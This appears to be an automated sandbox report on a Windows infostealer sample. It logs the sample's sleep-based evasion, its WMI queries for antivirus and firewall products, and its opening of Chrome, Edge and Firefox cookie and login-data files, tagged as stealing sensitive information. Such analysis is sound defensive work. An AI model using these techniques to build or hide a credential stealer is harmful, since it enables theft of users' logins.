                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59782s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -42901s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -36807s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -56014s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -58548s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -59014s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -52909s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -58907s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -58793s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -39089s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7364Thread sleep time: -58684s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -34074s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -40730s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -40495s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -51757s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -41174s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -42683s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -54993s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -31133s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -35473s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -45433s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -34951s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -45781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -50458s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -57833s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7468Thread sleep time: -420000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -31297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -52741s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -47750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -37200s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -55234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7460Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -34005s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -57039s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exe TID: 7344Thread sleep time: -51041s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59891Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59782Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59672Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 42901Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59563Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59453Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59344Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 36807Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59235Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 56014Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59125Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 58548Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 59014Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 52909Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 58907Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 58793Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 39089Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 58684Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 34074Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 40730Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 40495Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 51757Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 41174Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 42683Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 54993Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 31133Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 35473Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 45433Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 34951Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 45781Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 50458Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 57833Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 60000Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 31297Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 52741Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 47750Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 37200Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 55234Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 34005Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 57039Jump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeThread delayed: delay time: 51041Jump to behavior
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4124968111.0000000000C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_068729B8 LdrInitializeThunk,0_2_068729B8
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Users\user\Desktop\Kyuo21uNlG.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Kyuo21uNlG.exe, 00000000.00000002.4130405457.0000000005DA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Kyuo21uNlG.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Kyuo21uNlG.exe.420000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1673629570.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Kyuo21uNlG.exe PID: 7340, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: Yara matchFile source: Kyuo21uNlG.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.Kyuo21uNlG.exe.420000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1673629570.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
